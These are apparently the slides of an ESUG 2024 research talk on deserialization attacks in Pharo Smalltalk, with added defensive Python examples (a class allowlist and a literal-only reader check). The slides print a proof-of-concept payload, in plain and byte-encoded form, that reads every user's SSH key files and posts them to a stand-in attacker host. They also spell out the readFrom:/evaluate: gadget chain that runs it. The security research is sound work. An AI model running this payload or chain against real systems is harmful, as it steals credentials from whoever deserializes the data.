Attack chains construction: Towards detecting and preventing Pharo vulnerabilities
ESUG 2024 Talks
Imen Sayar, Steven Costiou, Cyril Ferlicot-Delbecque
Wednesday, July 10, 2024
Example of real-world attack
Source: https://www.theguardian.com/technology/2016/nov/28/passengers-free-ride-san-francisco-muni-ransomeware
Terminology
● CVE (Common Vulnerabilities and Exposures): ID + vulnerability description + patch (if any) + exploits + …
● Known databases for attack/vulnerability descriptions
  ○ OWASP (Open Web Application Security Project)
  ○ MITRE corporation
  ○ RedHat
  ○ NVD (National Vulnerability Database) of NIST
Example of CVE search
2818 CVEs on Java
148 CVEs on Java deserializ(s)ation
105 CVEs on Java injection
925 CVEs on Python
14211 CVEs on SQL injection
…
What about CVE search for Pharo?
- 0 CVEs on “Pharo”
- 0 CVEs for “SmallTalk”
No detected or reported attacks in Pharo?
So..
● There are no reported attacks in Pharo
  ○ does this mean that Pharo is safe?
    ■ if that’s the case, everything is fine :-)
    ■ if not, we need to know the potential attacks and to prevent them
● How do we know if Pharo is (really) safe?
Our goal is to check if Pharo code can be attacked: write a PoC of attacks.
Deserialization attacks!
Deserialization attacks
● Serialization: transform an object into a sequence of bytes
● Deserialization: reconstruct the object from the data available in the serialized sequence

A Serializable Java class, its instantiation, and the bytes produced by serializing the instance; deserialization reads those bytes back into an equivalent object.

import java.io.Serializable;

public class MyClass implements Serializable {
    int a;
    public MyClass(int a) {
        this.a = a;
    }
    // The method body is elided on the slide; a trivial body is given here so the class compiles.
    public int m() { return a; }
}

Instantiation:
MyClass mc = new MyClass(34);
[…]

Serialization (hex dump: ac ed 00 05 is the stream magic and version, "MyClass" the class descriptor, and the trailing 00 00 00 22 the int field a = 34):
00000000 ac ed 00 05 73 72 00 07 4d 79 43 6c 61 73 73 ed |....sr..MyClass.|
00000010 ef 00 78 02 ca 82 96 02 00 01 49 00 01 61 78 70 |..x.......I..axp|
00000020 00 00 00 22 |..."|
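To make the byte layout of that stream concrete, here is an added Python example (not code from the talk, nor from any Java or Pharo project): a reader for just the subset of the Java serialization protocol that the slide's stream uses (one Serializable class with primitive fields and no superclass). The point a defender cares about is that the class name is available from the class descriptor before any field data is consumed, which is where a look-ahead allowlist can refuse unexpected classes (the idea behind Java's ObjectInputFilter, JEP 290). The byte string is the slide's own hex dump; the `allowed` parameter and the `rejects` helper are this example's assumptions.

```python
# Added example (not from the talk): a reader for the subset of the Java
# serialization protocol used by the slide-9 stream, with a look-ahead
# class allowlist applied before any field data is consumed.
import struct

STREAM_MAGIC, STREAM_VERSION = 0xACED, 5
TC_NULL, TC_CLASSDESC, TC_OBJECT, TC_ENDBLOCKDATA = 0x70, 0x72, 0x73, 0x78
# Sizes of the primitive field type codes ('I' = int, 'J' = long, ...).
PRIMITIVE_SIZES = {"B": 1, "C": 2, "D": 8, "F": 4, "I": 4, "J": 8, "S": 2, "Z": 1}

# Constructed input: the bytes of the slide's hex dump for `new MyClass(34)`.
SLIDE_STREAM = bytes.fromhex(
    "aced0005" "73" "72" "0007" "4d79436c617373"    # magic, version, TC_OBJECT, TC_CLASSDESC, "MyClass"
    "edef007802ca8296" "02" "0001" "49" "0001" "61"  # serialVersionUID, SC_SERIALIZABLE, 1 field: int a
    "78" "70"                                        # TC_ENDBLOCKDATA, TC_NULL (no superclass)
    "00000022"                                       # field value a = 34
)


class Reader:
    """Cursor over the stream; every read fails loudly on truncation."""

    def __init__(self, data: bytes):
        self.data, self.pos = data, 0

    def take(self, n: int) -> bytes:
        chunk = self.data[self.pos:self.pos + n]
        if len(chunk) != n:
            raise ValueError("truncated stream")
        self.pos += n
        return chunk

    def u8(self) -> int:
        return self.take(1)[0]

    def u16(self) -> int:
        return struct.unpack(">H", self.take(2))[0]

    def utf(self) -> str:
        # Java writeUTF: 2-byte length followed by (modified) UTF-8 bytes.
        return self.take(self.u16()).decode("utf-8")


def read_class_desc(r: Reader) -> dict:
    """TC_CLASSDESC className serialVersionUID flags fieldCount fields annotation super."""
    if r.u8() != TC_CLASSDESC:
        raise ValueError("expected TC_CLASSDESC")
    name = r.utf()
    suid = struct.unpack(">q", r.take(8))[0]
    flags = r.u8()
    count = r.u16()
    fields = []
    for _ in range(count):
        code = chr(r.u8())
        if code not in PRIMITIVE_SIZES:
            raise ValueError("only primitive fields are handled here")
        fields.append((code, r.utf()))
    if r.u8() != TC_ENDBLOCKDATA or r.u8() != TC_NULL:
        raise ValueError("class annotations and superclasses are not handled here")
    return {"name": name, "suid": suid, "flags": flags, "fields": fields}


def parse_stream(data: bytes, allowed=None):
    """Return (class name, field values). With `allowed`, reject any other class
    as soon as its descriptor has been read, before its field data is touched."""
    r = Reader(data)
    if r.u16() != STREAM_MAGIC or r.u16() != STREAM_VERSION:
        raise ValueError("not a Java serialization stream")
    if r.u8() != TC_OBJECT:
        raise ValueError("expected TC_OBJECT")
    desc = read_class_desc(r)
    # Decision point of a look-ahead filter (cf. JEP 290 ObjectInputFilter):
    # the class is known, nothing of it has been instantiated yet.
    if allowed is not None and desc["name"] not in allowed:
        raise PermissionError(f"class {desc['name']!r} rejected by allowlist")
    values = {}
    for code, fname in desc["fields"]:
        raw = r.take(PRIMITIVE_SIZES[code])
        values[fname] = struct.unpack(">i", raw)[0] if code == "I" else raw
    return desc["name"], values


def rejects(data: bytes, allowed=None) -> bool:
    """True if the stream is refused (malformed, truncated, or not on the allowlist)."""
    try:
        parse_stream(data, allowed)
    except (ValueError, PermissionError):
        return True
    return False


if __name__ == "__main__":
    print(parse_stream(SLIDE_STREAM, allowed={"MyClass"}))       # ('MyClass', {'a': 34})
    print(rejects(SLIDE_STREAM, allowed={"java.util.HashMap"}))  # True
```

The allowlist check sits between reading the descriptor and reading the field values on purpose: a real deserializer that only checked after constructing the object would already have run the class's deserialization hooks, which is exactly where gadget chains start.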
Deserialization attack in PayPal in 2015
Source: https://artsploit.blogspot.com/2016/01/paypal-rce.html
Deserialization attacks 101
[Figure: the three stages of a deserialization attack. Legend: payload, gadget, exploit.]
1. Attacker side, malicious code: |users| users := (FileSystem disk root / ''Users''). (users entries collect:[:e| …] (what exactly this code is: ???)
   Serialization → malicious file: '#[124 117 115 101 114 115 124 13 117 115 101 114 115 32 58 61 32 40 70 105 108 101 83 121 115 116…]'
2. Victim side, deserialization: Object class>>readFrom: maliciousString → ??? → ???? → ??? … (the gadgets are still unknown at this point)
3. Attack action (steal sensitive data)
Understanding deserialization attacks
● Ysoserial* tool as a PoC for Java deserialization attacks
● We have studied 19 out of 47 attacks in Java described by ysoserial [1]
● We have extracted the call stacks of these attacks
● Our goal was to extract information from these attacks to reuse them in other languages
* https://github.com/frohoff/ysoserial
[1] Imen Sayar, Alexandre Bartel, Eric Bodden, and Yves Le Traon. “An in-depth study of Java deserialization remote-code execution exploits and vulnerabilities”. ACM Trans. Softw. Eng. Methodol., 32(1):25:1–25:45, 2023.
Ysoserial deserialization attacks
[Figure: gadgets used by the ysoserial attacks; labels visible on the slide: Jdk7 update 21, Commons Collections 3.1, Gadgets.]
Internal mechanisms in attacks
[Figure; labels: Reflection, Native calls, Vulnerable classes/methods.]
Observation n° 1
Attacks are not using new concepts. They are based on existing concepts such as reflection, native calls, and late binding.
Observation n° 2
The vulnerability is not a specific code fragment. It is a constellation of multiple method invocations combined into a so-called “Gadget Chain”.
Objective
Now that we have understood how deserialization attacks happen in Java, we target the Pharo language and try to create an attack. But, what are the ingredients for that?
Getting an Attack Recipe
[Figure, built up over three slides. Legend: payload, gadget, exploit.]
1. Attacker side: malicious code (???) that will generate the malicious file through serialization. The malicious file is a byte stream such as '#[124 117 115 101 114 115 124 13 117 115 101 114 115 32 58 61 32 40 70 105 108 101 83 121 115 116…]'.
2. Victim side: the ingredients still to be found are a vulnerable language version and the methods to invoke (the gadgets: ??? ??? ??? … ??? ???).
   Deserialization: send the malicious file to the victim; deserialize the content of the malicious file.
3. Attack action.
Payload for stealing SSH keys in Pharo
Malicious code (a Smalltalk string literal, hence the doubled quotes, converted to a byte array at the end):

'|users|
users := (FileSystem disk root / ''Users'').
(users entries collect: [:e |
    [|userSSHDir stolenFiles|
    userSSHDir := e asFileReference / ''.ssh''.
    stolenFiles := Dictionary new.
    userSSHDir entries do: [:file |
        stolenFiles at: file asFileReference path put: file asFileReference contents ].
    stolenFiles
    ] onErrorDo: [:err | nil ].
]).
ZnClient new
    url: ''www.attackerUrl.com'';
    contents: stolenFiles;
    post' asByteArray printString.

(1) capture the users path
(2) collect from the users entries all the ssh files
(3) create a dictionary to put the stolen ssh files in
(4) put the content of each ssh file in stolenFiles
(5) send the stolen ssh files to the attacker website
(6) transform the attack instructions into a ByteArray
Encoded payload for stealing SSH keys
'#[124 117 115 101 114 115 124 13 117 115 101 114 115 32 58 61 32 40 70 105 108 101 83 121 115 116 101 109 32 100 105 115
107 32 114 111 111 116 32 47 32 39 85 115 101 114 115 39 41 46 13 40 117 115 101 114 115 32 101 110 116 114 105 101 115 32
99 111 108 108 101 99 116 58 91 58 101 124 13 32 32 32 32 91 124 117 115 101 114 83 83 72 68 105 114 32 115 116 111 108 101
110 70 105 108 101 115 124 13 32 32 32 32 117 115 101 114 83 83 72 68 105 114 32 58 61 32 101 32 97 115 70 105 108 101 82
101 102 101 114 101 110 99 101 32 47 39 46 115 115 104 39 46 32 34 115 101 108 102 32 104 97 108 116 46 34 13 32 32 32 32
115 116 111 108 101 110 70 105 108 101 115 32 58 61 32 68 105 99 116 105 111 110 97 114 121 32 110 101 119 46 13 32 32 32
32 117 115 101 114 83 83 72 68 105 114 32 101 110 116 114 105 101 115 32 100 111 58 91 58 102 105 108 101 124 13 32 32 32
32 32 32 32 32 32 91 115 116 111 108 101 110 70 105 108 101 115 32 97 116 58 32 102 105 108 101 32 97 115 70 105 108 101 82
101 102 101 114 101 110 99 101 32 112 97 116 104 32 112 117 116 58 32 102 105 108 101 32 97 115 70 105 108 101 82 101 102
101 114 101 110 99 101 32 99 111 110 116 101 110 116 115 32 93 111 110 69 114 114 111 114 68 111 58 32 91 58 101 114 114
124 32 110 105 108 32 93 93 46 13 32 32 32 32 115 116 111 108 101 110 70 105 108 101 115 13 32 32 32 32 93 32 111 110 69 114
114 111 114 68 111 58 32 91 58 101 114 114 124 32 110 105 108 32 93 46 13 93 41 32 105 110 115 112 101 99 116 46 32 13 13 90
110 67 108 105 101 110 116 32 110 101 119 13 9 9 9 117 114 108 58 32 39 117 114 108 46 99 111 109 39 59 13 9 9 9 99 111 110
116 101 110 116 115 58 32 115 116 111 108 101 110 70 105 108 101 115 59 13 9 9 9 112 111 115 116]'
⇒ This malicious byte stream is unreadable by humans; it is sent to the victim, who deserializes it using the readFrom: method.
The readFrom: method
● The victim application will deserialize the maliciousString using the Object class >> readFrom: method
● The readFrom: method invokes the evaluate: method
  ○ both of them are considered as gadgets
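The two slides above make one point: the "serialized" string is Smalltalk source, and Object class>>readFrom: hands it to the compiler, so reading is evaluation. The following Python is an added example (not code from the talk, and not Pharo's parser): it decodes a #[...] byte-array literal back to the text it carries and then applies a literal-only grammar, the gate a safe reader would use instead of evaluate:. The sample literal is constructed from the first bytes of the slide-22 payload (the opening two lines of the slide-21 source); the tokenizer and the subset of literal syntax it accepts are this example's own assumptions.

```python
# Added example (not from the talk or from Pharo): decode a #[...] byte-array
# literal back to the text it carries, then decide with a literal-only grammar
# whether that text is data (a literal) or code, without ever evaluating it.
import re

# Constructed input: the first bytes of the slide-22 payload, i.e. the opening
# two lines of the slide-21 source (13 is the carriage return Pharo uses).
PAYLOAD_LITERAL = (
    "#[124 117 115 101 114 115 124 13 117 115 101 114 115 32 58 61 32 40 70 105 "
    "108 101 83 121 115 116 101 109 32 100 105 115 107 32 114 111 111 116 32 47 "
    "32 39 85 115 101 114 115 39 41 46]"
)

# Assumed subset of Smalltalk literal syntax; anything else ends up as `other`.
TOKEN = re.compile(r"""
    \s+
  | (?P<num>-?\d+(?:\.\d+)?)
  | (?P<str>'(?:[^']|'')*')
  | (?P<sym>\#(?:[A-Za-z_][A-Za-z0-9_:]*|'(?:[^']|'')*'))
  | (?P<barr>\#\[[\d\s]*\])
  | (?P<larr>\#\()
  | (?P<close>\))
  | (?P<word>\b(?:true|false|nil)\b)
  | (?P<ident>[A-Za-z_][A-Za-z0-9_]*)
  | (?P<other>.)
""", re.VERBOSE | re.DOTALL)


def decode_byte_array_literal(literal: str) -> str:
    """'#[104 105]' -> 'hi'. Raises on anything that is not a byte-array literal."""
    m = re.fullmatch(r"\s*\#\[([\d\s]*)\]\s*", literal)
    if not m:
        raise ValueError("not a #[...] byte-array literal")
    return bytes(int(t) for t in m.group(1).split()).decode("latin-1")


def tokenize(text: str):
    for m in TOKEN.finditer(text):
        if m.lastgroup is not None:          # skip whitespace
            yield m.lastgroup, m.group()


def is_literal_only(text: str) -> bool:
    """True iff `text` is one Smalltalk literal (number, string, symbol,
    byte array, true/false/nil, or a literal array of those), optionally
    followed by a statement period. Assumption of this example: nested
    literal arrays must be written with #( rather than a bare (."""
    toks = list(tokenize(text))
    if toks and toks[-1] == ("other", "."):
        toks.pop()
    pos = 0

    def literal(in_array: bool) -> bool:
        nonlocal pos
        if pos >= len(toks):
            return False
        kind, _ = toks[pos]
        if kind in ("num", "str", "sym", "barr", "word") or (in_array and kind == "ident"):
            pos += 1                         # inside #( ) a bare identifier is a symbol
            return True
        if kind == "larr":
            pos += 1
            while pos < len(toks) and toks[pos][0] != "close":
                if not literal(True):
                    return False
            if pos >= len(toks):
                return False                 # unterminated literal array
            pos += 1                         # consume ')'
            return True
        return False                         # message send, assignment, block, ...

    return literal(False) and pos == len(toks)


def classify(literal: str) -> tuple:
    """Decode a byte-array literal and label its content 'literal' or 'code'.
    A reader that accepted only the former could not be turned into a gadget."""
    text = decode_byte_array_literal(literal)
    return ("literal" if is_literal_only(text) else "code"), text


if __name__ == "__main__":
    kind, text = classify(PAYLOAD_LITERAL)
    print(kind)                              # code
    print(text.replace("\r", "\n"))
```

Run stand-alone it prints `code` followed by the decoded opening of the payload; the same function returns `literal` for `#[39 104 105 39]` (the string 'hi'). The decisive design choice is that the gate never calls a compiler: it accepts a closed grammar of data and rejects everything else, which is the property `readFrom:` lacks.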
Pharo attack conduct
[Figure. Legend: payload, gadget, exploit.]
1. Attacker side, malicious code: |users| users := (FileSystem disk root / ''Users''). (users entries collect:[:e| …]
   Serialization → malicious file maliciousString: '#[124 117 115 101 114 115 124 13 117 115 101 114 115 32 58 61 32 40 70 105 108 101 83 121 115 116…]'
2. Victim side, deserialization (gadget chain): Object class>>readFrom: maliciousString → OpalCompiler>>evaluate: maliciousString → OCReceiverDoItSemanticScope(OCDoItSemanticScope)>>evaluateDoIt: → … → evaluate → ZnClient>>post
3. Attack action (steal and send SSH keys to www.attackerUrl.com)
What’s next?
● Shall we deprecate then remove Object class>>readFrom:?
● No Security Manager in Pharo for preventing attacks
  ○ introduce this concept natively in Pharo?
● One of the main problems in the attacks is that the victim application contains openings to the outside (e.g., reading from an external file, a queryable database)
  ○ why not detect these openings and control them?
Conclusion
● Vulnerabilities still exist in Object Oriented languages
● Pharo attack chains construction for 3 attacks
● It is relevant to consider and implement security checks when coding in Pharo
Thank you!
Backup slides
Java: installing a SecurityManager so that sensitive operations (file and network access, reflection) go through permission checks.

// Note: SecurityManager is deprecated for removal since Java 17 (JEP 411).
SecurityManager secuManager = new SecurityManager();
System.setSecurityManager(secuManager);
Pharo with a Security Manager
[Figure: the attack conduct with a Security Manager box added on the victim side. Legend: payload, gadget, exploit.]
1. Attacker side, malicious code: |users| users := (FileSystem disk root / ''Users''). (users entries collect:[:e| …]
   Serialization → malicious file maliciousString: '#[124 117 115 101 114 115 124 13 117 115 101 114 115 32 58 61 32 40 70 105 108 101 83 121 115 116…]'
2. Victim side, deserialization: Object class>>readFrom: maliciousString → OpalCompiler>>evaluate: textStringOrStream → Security Manager
